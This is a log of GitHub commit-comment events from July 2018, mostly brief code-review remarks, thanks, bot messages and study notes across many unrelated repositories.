{"id":"8033904606","type":"CommitCommentEvent","actor":{"login":"PascalPrecht"},"repo":{"name":"ipfs/js-ipfs"},"payload":{"comment":{"id":29874085,"position":6,"line":14,"path":"src/core/components/dag.js","commit_id":"d299ed77c288d82ce807af0ec7a5b2605336626f","created_at":"2018-07-29T12:31:21Z","updated_at":"2018-07-29T12:31:21Z","author_association":"CONTRIBUTOR","body":"And it makes sense, because we didn't account for when there's also no callback given. This commit assumed that there's always going to be either `options` or a `callback`.\r\n\r\nDidn't think of `async/await` use cases - my bad! 😥"}},"created_at":"2018-07-29T12:31:21Z"}
{"id":"8033905804","type":"CommitCommentEvent","actor":{"login":"hschweitzer"},"repo":{"name":"hschweitzer/AniList-Plus"},"payload":{"comment":{"id":29874087,"position":null,"line":null,"path":null,"commit_id":"70ea0178f0dae289af5cace1085a08e415cf30a7","created_at":"2018-07-29T12:32:12Z","updated_at":"2018-07-29T12:32:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Améliorer contraste des notes pour light theme](https://trello.com/c/335zh6GR/4-am%C3%A9liorer-contraste-des-notes-pour-light-theme)"}},"created_at":"2018-07-29T12:32:12Z"}
{"id":"8033907136","type":"CommitCommentEvent","actor":{"login":"dguerri"},"repo":{"name":"facebook/fbthrift"},"payload":{"comment":{"id":29874090,"position":4,"line":107,"path":"thrift/lib/py/server/TAsyncioServer.py","commit_id":"7ebd86675274a15ea8c090377757ec9ae196dc79","created_at":"2018-07-29T12:33:10Z","updated_at":"2018-07-29T12:33:10Z","author_association":"CONTRIBUTOR","body":"custom event handler for TAsyncio server was already present... as a matter of fact all the changes in this file just shuffle things around? :)"}},"created_at":"2018-07-29T12:33:10Z"}
{"id":"8033911052","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29874099,"position":null,"line":null,"path":null,"commit_id":"821f09fb63cad24dc4467ec75f982270914af917","created_at":"2018-07-29T12:36:05Z","updated_at":"2018-07-29T12:36:05Z","author_association":"MEMBER","body":"![bugs](https://user-images.githubusercontent.com/31389848/43366328-3ade2f92-9334-11e8-9cf4-8fa6f2c7b7a7.gif)\r\n"}},"created_at":"2018-07-29T12:36:05Z"}
{"id":"8033912126","type":"CommitCommentEvent","actor":{"login":"electricmonk"},"repo":{"name":"orbs-network/go-mock"},"payload":{"comment":{"id":29874104,"position":null,"line":null,"path":null,"commit_id":"f503f8e073da5b0f1580299c81ceb43d1432df56","created_at":"2018-07-29T12:36:57Z","updated_at":"2018-07-29T12:36:57Z","author_association":"NONE","body":"@talkol you broke some unit tests with this commit"}},"created_at":"2018-07-29T12:36:57Z"}
{"id":"8033914046","type":"CommitCommentEvent","actor":{"login":"kartikay101"},"repo":{"name":"kartikay101/file-header"},"payload":{"comment":{"id":29874112,"position":null,"line":null,"path":null,"commit_id":"d006e791e8f3b0cd766eabc2f17d88212d58527d","created_at":"2018-07-29T12:38:23Z","updated_at":"2018-07-29T12:38:23Z","author_association":"OWNER","body":"This fixes the issue where the default value is loaded instead of the changed value (of the username field), when the atom editor is run from a different console window"}},"created_at":"2018-07-29T12:38:23Z"}
{"id":"8033915918","type":"CommitCommentEvent","actor":{"login":"lucy201703"},"repo":{"name":"lucy201703/TranslatingForWriting"},"payload":{"comment":{"id":29874114,"position":6,"line":5,"path":"201805-Classic-Style/ch9/BookCommentsPartTwo&AuthorIntro.md","commit_id":"9d5befed403d8fd7297293b7e72b3136b9e1e863","created_at":"2018-07-29T12:39:50Z","updated_at":"2018-07-29T12:39:50Z","author_association":"OWNER","body":"The best book I have read on the substance of prose style is Thomas and Turner, Clear and Simple as the Truth\r\n\r\n译1：我读过的书中，对文本风格本质论述得最好的是托马斯和特纳的《古典风格》。\r\n译2：托马斯和特纳的《古典风格》对文本风格本质讲得最好，超过我看过的任何一本书。\r\n译3：我看过的书中，对文本风格本质的论述，没有哪一本比托马斯和特纳的《古典风格》讲得更好了。\r\n译4：我看过的书中，对文本风格本质讲得最好的是托马斯和特纳的《古典风格》。\r\n译5：我看过的书中，托马斯和特纳的《古典风格》对文本风格的本质讲得最好。"}},"created_at":"2018-07-29T12:39:50Z"}
{"id":"8033917112","type":"CommitCommentEvent","actor":{"login":"AkiraNorthstar"},"repo":{"name":"inkstitch/inkstitch"},"payload":{"comment":{"id":29874115,"position":null,"line":null,"path":null,"commit_id":"79312d5b11aca258f717c860f61fd58f5cc46d11","created_at":"2018-07-29T12:40:40Z","updated_at":"2018-07-29T12:40:40Z","author_association":"MEMBER","body":"Wow! You do a really good job!"}},"created_at":"2018-07-29T12:40:40Z"}
{"id":"8033921266","type":"CommitCommentEvent","actor":{"login":"amivaleo"},"repo":{"name":"Maestroschan/emoji-selector-for-gnome"},"payload":{"comment":{"id":29874135,"position":null,"line":null,"path":null,"commit_id":"9b7a89b7ddaf316f1ac5046a29eb14cc78d70650","created_at":"2018-07-29T12:43:57Z","updated_at":"2018-07-29T12:43:57Z","author_association":"CONTRIBUTOR","body":"I wish I had your skills."}},"created_at":"2018-07-29T12:43:57Z"}
{"id":"8033924248","type":"CommitCommentEvent","actor":{"login":"warkentien2"},"repo":{"name":"delilah6258/project-1"},"payload":{"comment":{"id":29874139,"position":21,"line":21,"path":"Index.html","commit_id":"c60c96c1bd3522306ffe720da045f48d4a100f64","created_at":"2018-07-29T12:46:11Z","updated_at":"2018-07-29T12:46:11Z","author_association":"NONE","body":"Missing closed `</header>`"}},"created_at":"2018-07-29T12:46:11Z"}
{"id":"8033924690","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29874140,"position":null,"line":null,"path":null,"commit_id":"342662ff7225993e253f37b56707aae66b0d51fb","created_at":"2018-07-29T12:46:31Z","updated_at":"2018-07-29T12:46:31Z","author_association":"OWNER","body":"please run [build]"}},"created_at":"2018-07-29T12:46:31Z"}
{"id":"8033924736","type":"CommitCommentEvent","actor":{"login":"vspinu"},"repo":{"name":"clojure-emacs/cider"},"payload":{"comment":{"id":29874141,"position":null,"line":null,"path":null,"commit_id":"7d3c3c8620dcae86c708279e4cb844891bf11cd0","created_at":"2018-07-29T12:46:33Z","updated_at":"2018-07-29T12:46:33Z","author_association":"CONTRIBUTOR","body":"Thanks! :)"}},"created_at":"2018-07-29T12:46:33Z"}
{"id":"8033925382","type":"CommitCommentEvent","actor":{"login":"warkentien2"},"repo":{"name":"delilah6258/project-1"},"payload":{"comment":{"id":29874142,"position":17,"line":17,"path":"Index.html","commit_id":"c60c96c1bd3522306ffe720da045f48d4a100f64","created_at":"2018-07-29T12:47:03Z","updated_at":"2018-07-29T12:47:03Z","author_association":"NONE","body":"Remove all these `width`, `height`. They are conflicting with CSS. \r\nIt's simpler to never hardcode dimensions on your HTML."}},"created_at":"2018-07-29T12:47:03Z"}
{"id":"8033927316","type":"CommitCommentEvent","actor":{"login":"warkentien2"},"repo":{"name":"delilah6258/project-1"},"payload":{"comment":{"id":29874148,"position":28,"line":28,"path":"Index.html","commit_id":"c60c96c1bd3522306ffe720da045f48d4a100f64","created_at":"2018-07-29T12:48:26Z","updated_at":"2018-07-29T12:48:26Z","author_association":"NONE","body":"Good job adding the Featured title inside the `.featured` `<section>`!"}},"created_at":"2018-07-29T12:48:26Z"}
{"id":"8033927354","type":"CommitCommentEvent","actor":{"login":"elucidsoft"},"repo":{"name":"elucidsoft/dotnet-stellar-sdk"},"payload":{"comment":{"id":29874150,"position":null,"line":null,"path":null,"commit_id":"ea51d29884bc66fcc769a44ce17c000cc761ed3d","created_at":"2018-07-29T12:48:27Z","updated_at":"2018-07-29T12:48:27Z","author_association":"OWNER","body":"Lgtm"}},"created_at":"2018-07-29T12:48:27Z"}
{"id":"8033929477","type":"CommitCommentEvent","actor":{"login":"negamaxi"},"repo":{"name":"ipfs/js-ipfs"},"payload":{"comment":{"id":29874163,"position":6,"line":14,"path":"src/core/components/dag.js","commit_id":"d299ed77c288d82ce807af0ec7a5b2605336626f","created_at":"2018-07-29T12:50:08Z","updated_at":"2018-07-29T12:50:08Z","author_association":"NONE","body":"I've created a pull request with additional tests https://github.com/ipfs/interface-ipfs-core/pull/338. I'm ready to provide a patch for js-ipfs too, if needed."}},"created_at":"2018-07-29T12:50:08Z"}
{"id":"8033929604","type":"CommitCommentEvent","actor":{"login":"Maestroschan"},"repo":{"name":"Maestroschan/emoji-selector-for-gnome"},"payload":{"comment":{"id":29874164,"position":null,"line":null,"path":null,"commit_id":"9b7a89b7ddaf316f1ac5046a29eb14cc78d70650","created_at":"2018-07-29T12:50:13Z","updated_at":"2018-07-29T12:50:13Z","author_association":"OWNER","body":"actually i copy-paste this https://gitlab.gnome.org/GNOME/gnome-shell/blob/master/js/ui/status/system.js#L266"}},"created_at":"2018-07-29T12:50:13Z"}
{"id":"8033930678","type":"CommitCommentEvent","actor":{"login":"ItWasAllIntended"},"repo":{"name":"pYtato-KK/ProLog"},"payload":{"comment":{"id":29874165,"position":null,"line":null,"path":null,"commit_id":"14d51fa3a294338ffebe96002f0f7b6a64fcaf27","created_at":"2018-07-29T12:51:03Z","updated_at":"2018-07-29T12:51:03Z","author_association":"COLLABORATOR","body":"What are you on about"}},"created_at":"2018-07-29T12:51:03Z"}
{"id":"8033931318","type":"CommitCommentEvent","actor":{"login":"Simkyu"},"repo":{"name":"Simkyu/algo_algospot"},"payload":{"comment":{"id":29874166,"position":null,"line":null,"path":null,"commit_id":"93caadaca4bc1752c055344fe7fe2a9b7bc54a80","created_at":"2018-07-29T12:51:27Z","updated_at":"2018-07-29T12:51:27Z","author_association":"OWNER","body":"algospot 입력 양식상 스캐너와 print를 사용하여 입출력.\r\n백준알고리즘 9012번과 유사.\r\n\r\n2~3번 런타임 오류 발생 : \r\n1. 닫는괄호 부터 오는 경우를 추가해주지 않음. => st.isEmpty() 조건 추가\r\n2. 스택이 비어있는경우 판별 st.lastElement().toString.equals() 조건에서 문제 발생\r\n=> st.isEmpty() 조건을 앞으로 가져와서 해결(short-circuit)"}},"created_at":"2018-07-29T12:51:27Z"}
{"id":"8033933666","type":"CommitCommentEvent","actor":{"login":"ButcherV"},"repo":{"name":"ButcherV/Vue-study"},"payload":{"comment":{"id":29874172,"position":null,"line":null,"path":null,"commit_id":"19647c0e77daec7b909975c41674221d7de324ca","created_at":"2018-07-29T12:53:13Z","updated_at":"2018-07-29T12:53:13Z","author_association":"OWNER","body":"\r\n1. 三括号的形式：{{{}}} 既等于 v-html 的形式，vue.2.0 这种语法已经不存在？\r\nvue 2.x 的文档中只提了 v-html，并没有 {{{}}}\r\nvue 1.0 的文档中只有 {{{}}}，没有 v-html\r\n2. ` 该符号在 es6 的模板语法代表的意义，\r\n3. 在 github 中维护，以 PR 的形式改进。\r\n4. ` 该符号在 es6 的模板语法代表的意义。\r\nES6 的模板字符串（template string）是增强版的字符串，用反引号（`）标识。它可以当作普通字符串使用，也可以用来定义多行字符串，或者在字符串中嵌入变量。\r\n```\r\n#ES5 写法\r\n$('#result').append(\r\n  'There are <b>' + basket.count + '</b> ' +\r\n  'items in your basket, ' +\r\n  '<em>' + basket.onSale +\r\n  '</em> are on sale!'\r\n);\r\n```\r\n```\r\n#ES6 写法\r\n$('#result').append(`\r\n  There are <b>${basket.count}</b> items\r\n  in your basket, <em>${basket.onSale}</em>\r\n  are on sale!\r\n`);\r\n```\r\n\r\n5. 少写标点导致报错的问题，不是 vue 的问题，找报错用浏览器也不合适。应该在编辑器的用 eslint 来规避。"}},"created_at":"2018-07-29T12:53:13Z"}
{"id":"8033935445","type":"CommitCommentEvent","actor":{"login":"ButcherV"},"repo":{"name":"ButcherV/Vue-study"},"payload":{"comment":{"id":29874186,"position":35,"line":35,"path":"vue-tab.html","commit_id":"19647c0e77daec7b909975c41674221d7de324ca","created_at":"2018-07-29T12:54:35Z","updated_at":"2018-07-29T12:54:35Z","author_association":"OWNER","body":"id 不够语义化"}},"created_at":"2018-07-29T12:54:35Z"}
{"id":"8033937574","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"heaeat/pcap_test"},"payload":{"comment":{"id":29874189,"position":29,"line":36,"path":"main.cpp","commit_id":"94947272a65e6d65dc624216352851f985f96251","created_at":"2018-07-29T12:56:11Z","updated_at":"2018-07-29T12:56:11Z","author_association":"NONE","body":"host byte order / network byte order\r\nlittie endian / big endian\r\n에 대해 수업 시간에 얘기해 보도록 하겠습니다."}},"created_at":"2018-07-29T12:56:11Z"}
{"id":"8033937768","type":"CommitCommentEvent","actor":{"login":"amivaleo"},"repo":{"name":"Maestroschan/emoji-selector-for-gnome"},"payload":{"comment":{"id":29874190,"position":null,"line":null,"path":null,"commit_id":"9b7a89b7ddaf316f1ac5046a29eb14cc78d70650","created_at":"2018-07-29T12:56:20Z","updated_at":"2018-07-29T12:56:20Z","author_association":"CONTRIBUTOR","body":"You can write in this coding language and you're good in finding what you need. These are the skills I'd like to have. :("}},"created_at":"2018-07-29T12:56:20Z"}
{"id":"8033939060","type":"CommitCommentEvent","actor":{"login":"warkentien2"},"repo":{"name":"delilah6258/project-1"},"payload":{"comment":{"id":29874191,"position":null,"line":null,"path":null,"commit_id":"c60c96c1bd3522306ffe720da045f48d4a100f64","created_at":"2018-07-29T12:57:16Z","updated_at":"2018-07-29T12:57:16Z","author_association":"NONE","body":"Hey, Amanda!\r\n\r\nSorry I took so long. The mentor message board has been down for four days in a row. \r\nAnd since I don't want to keep you waiting any longer, I'm reaching out via other channels. \r\n\r\nMentors are pressuring for an official notice to the students. \r\n\r\n**The bug:** Mentor messages aren't getting sent and disappear as soon as we refresh the Browser. \r\n\r\nYou can add me on LinkedIn \r\nhttps://www.linkedin.com/in/warkentien2/\r\nIt's easier to keep track of your replies. And I want to reference this project with some screenshots. "}},"created_at":"2018-07-29T12:57:16Z"}
{"id":"8033939998","type":"CommitCommentEvent","actor":{"login":"wyamamo"},"repo":{"name":"wyamamo/UVM101"},"payload":{"comment":{"id":29874195,"position":null,"line":null,"path":null,"commit_id":"9a3cb915152c9f8138f1a00a7c54a1f24db23cb6","created_at":"2018-07-29T12:57:52Z","updated_at":"2018-07-29T12:57:52Z","author_association":"OWNER","body":"uvm_top.top_levels[] array access example"}},"created_at":"2018-07-29T12:57:52Z"}
{"id":"8033944262","type":"CommitCommentEvent","actor":{"login":"vspinu"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":29874214,"position":null,"line":null,"path":null,"commit_id":"738c276af7bde4eed1ddae467abe0f28cee067fb","created_at":"2018-07-29T13:00:34Z","updated_at":"2018-07-29T13:00:34Z","author_association":"MEMBER","body":"Nothing wrong with seq per se, just an obfuscated implementation of a simple filtering pattern. But you are right, I missed the intent for the bare keywords."}},"created_at":"2018-07-29T13:00:34Z"}
{"id":"8033945372","type":"CommitCommentEvent","actor":{"login":"LoutreT"},"repo":{"name":"LoutreT/SCALA-Bases.1"},"payload":{"comment":{"id":29874215,"position":null,"line":null,"path":null,"commit_id":"7d9744439aa6ffd7c65f728720baf59177b7230f","created_at":"2018-07-29T13:01:11Z","updated_at":"2018-07-29T13:01:11Z","author_association":"OWNER","body":"N'a pas besoin de contenir des parenthèses, accolades, crochets, points, virgules, points-virgules, apostrophes ou guillemets"}},"created_at":"2018-07-29T13:01:11Z"}
{"id":"8033946059","type":"CommitCommentEvent","actor":{"login":"Bastian"},"repo":{"name":"Javacord/javacord.github.io"},"payload":{"comment":{"id":29874216,"position":null,"line":null,"path":null,"commit_id":"c26aa60a2efa4a50324471469ce5ad9af8fd6c2c","created_at":"2018-07-29T13:01:38Z","updated_at":"2018-07-29T13:01:38Z","author_association":"MEMBER","body":"A typo in a commit message for a commit that fixes a typo. 👌 "}},"created_at":"2018-07-29T13:01:38Z"}
{"id":"8033946871","type":"CommitCommentEvent","actor":{"login":"ShandyGaffLover"},"repo":{"name":"ShandyGaffLover/training"},"payload":{"comment":{"id":29874218,"position":null,"line":null,"path":null,"commit_id":"a3b11e9eb60ad9b3a8ce796a1a90597162d2d6b0","created_at":"2018-07-29T13:02:15Z","updated_at":"2018-07-29T13:02:15Z","author_association":"OWNER","body":"自分で気が付いた改修すべきと思われるポイントは2つ\r\n①入力エラーのハンドリング処理\r\n②８行目～１６行目を関数化することによるネストの除去\r\n③２～４行目は変数ではなく定数宣言にしたい（あるよね？）"}},"created_at":"2018-07-29T13:02:15Z"}
{"id":"8033951849","type":"CommitCommentEvent","actor":{"login":"lionel-"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":29874230,"position":null,"line":null,"path":null,"commit_id":"738c276af7bde4eed1ddae467abe0f28cee067fb","created_at":"2018-07-29T13:05:41Z","updated_at":"2018-07-29T13:05:41Z","author_association":"MEMBER","body":"Splitting a list in two with a predicate is \"obfuscation\"?"}},"created_at":"2018-07-29T13:05:41Z"}
{"id":"8033952841","type":"CommitCommentEvent","actor":{"login":"lebicojerome"},"repo":{"name":"Genoil/cpp-ethereum"},"payload":{"comment":{"id":29874233,"position":null,"line":null,"path":null,"commit_id":"1c7c1ca48ff669d1f590942af78fc75d6f4022e7","created_at":"2018-07-29T13:06:23Z","updated_at":"2018-07-29T13:06:23Z","author_association":"NONE","body":"?"}},"created_at":"2018-07-29T13:06:23Z"}
{"id":"8033954436","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29874237,"position":null,"line":null,"path":null,"commit_id":"95a07e0aaa37955ce2c2373d2d9ad6df32756770","created_at":"2018-07-29T13:07:32Z","updated_at":"2018-07-29T13:07:32Z","author_association":"NONE","body":"Looking closer i see that this can not work as intended. You use something from Type RootMove as index of the map. But RootMove is a struct with the pv, scores and other stuff. Normally this would not usable as map index. Only if a comparison operator is defined. for RootMove we have following:\r\n```\r\nbool operator<(const RootMove& m) const { // Sort in descending order\r\n    return m.score != score ? m.score < score\r\n                            : m.previousScore < previousScore;\r\n  }\r\n```\r\nSo the score are compared `not the moves`. So you collect a vote per pair score/previousScore. You have to use direct the type Move for the map and use `th->rootMoves[0].pv[0]` for indexing."}},"created_at":"2018-07-29T13:07:32Z"}
{"id":"8033955272","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29874238,"position":null,"line":null,"path":null,"commit_id":"342662ff7225993e253f37b56707aae66b0d51fb","created_at":"2018-07-29T13:08:09Z","updated_at":"2018-07-29T13:08:09Z","author_association":"OWNER","body":"Please run [build]"}},"created_at":"2018-07-29T13:08:09Z"}
{"id":"8033957323","type":"CommitCommentEvent","actor":{"login":"Silex"},"repo":{"name":"Silex/docker.el"},"payload":{"comment":{"id":29874248,"position":8,"line":38,"path":"docker.el","commit_id":"96404e896627f737a219f096aa080aa4d8538639","created_at":"2018-07-29T13:09:39Z","updated_at":"2018-07-29T13:09:39Z","author_association":"OWNER","body":"Okay, I removed the sillyness. For a moment I liked the idea that each library was independent, but it seems to cause more trouble than its worth."}},"created_at":"2018-07-29T13:09:39Z"}
{"id":"8033960649","type":"CommitCommentEvent","actor":{"login":"blipn"},"repo":{"name":"blipn/LiveBoxTV-PC-Remote"},"payload":{"comment":{"id":29874252,"position":null,"line":null,"path":null,"commit_id":"39f3e78f71e682565437ac38a1f048c19ed0abc5","created_at":"2018-07-29T13:12:06Z","updated_at":"2018-07-29T13:12:06Z","author_association":"OWNER","body":"Hello you can download and launch the last release here :\nhttps://github.com/blipn/LiveBoxTV-PC-Remote/releases/download/v1.0/LBPCR.jar\n\nLe dim. 29 juil. 2018 à 05:38, Paulwormald <notifications@github.com> a\nécrit :\n\n> How do I install this livebox remote on my pc to use because I am lost\n> trying ?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/blipn/LiveBoxTV-PC-Remote/commit/39f3e78f71e682565437ac38a1f048c19ed0abc5#commitcomment-29872178>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJZSpunAHwworxdT1Q1aAIMFm6Z5BfMpks5uLS4sgaJpZM4VlReU>\n> .\n>\n"}},"created_at":"2018-07-29T13:12:06Z"}
{"id":"8033961661","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-drat-feedstock"},"payload":{"comment":{"id":29874253,"position":null,"line":null,"path":null,"commit_id":"e37605504e31db3166eac2c3325c4cc77d9644cc","created_at":"2018-07-29T13:12:47Z","updated_at":"2018-07-29T13:12:47Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @dbast was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-29T13:12:47Z"}
{"id":"8033966097","type":"CommitCommentEvent","actor":{"login":"Suchismit4"},"repo":{"name":"MintyCodesYT/TutorialClient1.8.8"},"payload":{"comment":{"id":29874265,"position":null,"line":null,"path":null,"commit_id":"2a5b967dadbef2d53813e85fdbac632a64dad550","created_at":"2018-07-29T13:15:57Z","updated_at":"2018-07-29T13:15:57Z","author_association":"NONE","body":"The code where func_181656_b() should be static not \"boolean\". \r\n"}},"created_at":"2018-07-29T13:15:57Z"}
{"id":"8033966953","type":"CommitCommentEvent","actor":{"login":"Regalis11"},"repo":{"name":"Regalis11/Barotrauma"},"payload":{"comment":{"id":29874268,"position":null,"line":null,"path":null,"commit_id":"aa5b2a973e3cc4657a231cb6ac633579c8acf03d","created_at":"2018-07-29T13:16:30Z","updated_at":"2018-07-29T13:16:30Z","author_association":"OWNER","body":"This is something I've been meaning to implement for a long time (and actually it's already been partially implement already, just not used at all because it doesn't work correctly yet), you're issue report just inspired me to finally finish the feature. :) \r\n\r\nMirroring the submarine would be another way to implement it, but I feel like this is a better way to do it. Playing in mirrored subs is somewhat confusing, especially if your sub keeps switching from a mirrored layout to normal depending on the direction you're travelling to. Also, the way I'm planning on implementing the mirroring does not cause that glitch you described. Determining which location is the starting point and which is the ending point does not depend on the actual positions of the locations on the map - it's based on a voronoi graph where the first point of an edge is the starting location and the second is the end. It's trivial to check which direction the player is traveling to, regardless of whether the player \"circles\" to the previous station through other locations."}},"created_at":"2018-07-29T13:16:30Z"}
{"id":"8033968555","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-mockery-feedstock"},"payload":{"comment":{"id":29874273,"position":null,"line":null,"path":null,"commit_id":"a2b0defa260404fe6946706e98bed72adb1c9b41","created_at":"2018-07-29T13:17:39Z","updated_at":"2018-07-29T13:17:39Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @dbast was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-29T13:17:39Z"}
{"id":"8033968964","type":"CommitCommentEvent","actor":{"login":"socialskyo"},"repo":{"name":"rhymix/rhymix"},"payload":{"comment":{"id":29874274,"position":null,"line":null,"path":null,"commit_id":"d069cf1194deaf126353b67434233ec807373fb9","created_at":"2018-07-29T13:18:01Z","updated_at":"2018-07-29T13:18:01Z","author_association":"NONE","body":"\r\n[DSDT.aml.zip](https://github.com/rhymix/rhymix/files/2238797/DSDT.aml.zip)\r\n\r\n파일 확장자 형식에 따라 달라지는 듯 합니다. \r\n\r\n압축을 풀면 .aml 파일이 나오는데 해당 확장자로 되어 있는 파일은 문제가 있어 보입니다. \r\n![2018-07-29 10 16 14](https://user-images.githubusercontent.com/6075830/43366707-1fa7f304-937d-11e8-9a4a-6a07bcf66a01.png)\r\n타운에서는 해당 파일로 아래와 같은 화면이 나오지만 업로드는 됩니다. \r\n\r\n또 어떤 파일 형식이 문제가 되는지는 모르겠지만 더 발견이 되면 말씀 드리겠습니다.\r\n"}},"created_at":"2018-07-29T13:18:01Z"}
{"id":"8033969430","type":"CommitCommentEvent","actor":{"login":"Socutecat"},"repo":{"name":"Socutecat/Project_1"},"payload":{"comment":{"id":29874277,"position":127,"line":93,"path":"css/style.css","commit_id":"067977a545cc49675be818d5b3f5fd963ae4750b","created_at":"2018-07-29T13:18:21Z","updated_at":"2018-07-29T13:18:21Z","author_association":"OWNER","body":"bad code\r\n"}},"created_at":"2018-07-29T13:18:21Z"}
{"id":"8033969688","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29874278,"position":null,"line":null,"path":null,"commit_id":"95a07e0aaa37955ce2c2373d2d9ad6df32756770","created_at":"2018-07-29T13:18:32Z","updated_at":"2018-07-29T13:18:32Z","author_association":"OWNER","body":"Thx @locutus2 , this means that I was probably selecting the thread with the maximum `score + depth`, which seems promising."}},"created_at":"2018-07-29T13:18:32Z"}
{"id":"8033969892","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"unshiftio/url-parse"},"payload":{"comment":{"id":29874279,"position":37,"line":37,"path":"SECURITY.md","commit_id":"d7b582ec1243e8024e60ac0b62d2569c939ef5de","created_at":"2018-07-29T13:18:42Z","updated_at":"2018-07-29T13:18:42Z","author_association":"MEMBER","body":"The open redirect vulnerability is not fixed."}},"created_at":"2018-07-29T13:18:42Z"}
{"id":"8033970586","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-bgmm-feedstock"},"payload":{"comment":{"id":29874280,"position":null,"line":null,"path":null,"commit_id":"4387c9a8a4b06bbbba4d2ece871fbf357b0717ec","created_at":"2018-07-29T13:19:14Z","updated_at":"2018-07-29T13:19:14Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-29T13:19:14Z"}
{"id":"8033971673","type":"CommitCommentEvent","actor":{"login":"boante"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29874282,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-29T13:20:00Z","updated_at":"2018-07-29T13:20:00Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-29T13:20:00Z"}
{"id":"8033972180","type":"CommitCommentEvent","actor":{"login":"mschuchard"},"repo":{"name":"mschuchard/linter-terraform-syntax"},"payload":{"comment":{"id":29874285,"position":19,"line":44,"path":"lib/main.js","commit_id":"16847944a1c1450a008501344d87ce6d1e4831da","created_at":"2018-07-29T13:20:19Z","updated_at":"2018-07-29T13:20:19Z","author_association":"OWNER","body":"Right, I forgot what the package was called. At one point I wanted to rename it and never did, but apparently in my head I did rename the package."}},"created_at":"2018-07-29T13:20:19Z"}
{"id":"8033974602","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29874290,"position":null,"line":null,"path":null,"commit_id":"0ff81d90affb8c0d7d234bc9706120e5c11cf017","created_at":"2018-07-29T13:22:03Z","updated_at":"2018-07-29T13:22:03Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-29T13:22:03Z"}
{"id":"8033985377","type":"CommitCommentEvent","actor":{"login":"Silex"},"repo":{"name":"Silex/docker.el"},"payload":{"comment":{"id":29874328,"position":8,"line":38,"path":"docker.el","commit_id":"96404e896627f737a219f096aa080aa4d8538639","created_at":"2018-07-29T13:29:30Z","updated_at":"2018-07-29T13:29:30Z","author_association":"OWNER","body":"Fixed by https://github.com/Silex/docker.el/commit/2a0bb3aa7b747ab6b8295eb934783971d4c21fed, best of both worlds. DAG and each subfile is independant."}},"created_at":"2018-07-29T13:29:30Z"}
{"id":"8033985766","type":"CommitCommentEvent","actor":{"login":"Silex"},"repo":{"name":"Silex/docker.el"},"payload":{"comment":{"id":29874329,"position":8,"line":38,"path":"docker.el","commit_id":"96404e896627f737a219f096aa080aa4d8538639","created_at":"2018-07-29T13:29:46Z","updated_at":"2018-07-29T13:29:46Z","author_association":"OWNER","body":"Thanks for the review!"}},"created_at":"2018-07-29T13:29:46Z"}
{"id":"8033989871","type":"CommitCommentEvent","actor":{"login":"Gaegul"},"repo":{"name":"DSM-GRAM/The-Manual-Backend"},"payload":{"comment":{"id":29874339,"position":null,"line":null,"path":null,"commit_id":"e22dd0eef6cf17f30e16a9f3292df37894558943","created_at":"2018-07-29T13:32:41Z","updated_at":"2018-07-29T13:32:41Z","author_association":"CONTRIBUTOR","body":"이슈처리"}},"created_at":"2018-07-29T13:32:41Z"}
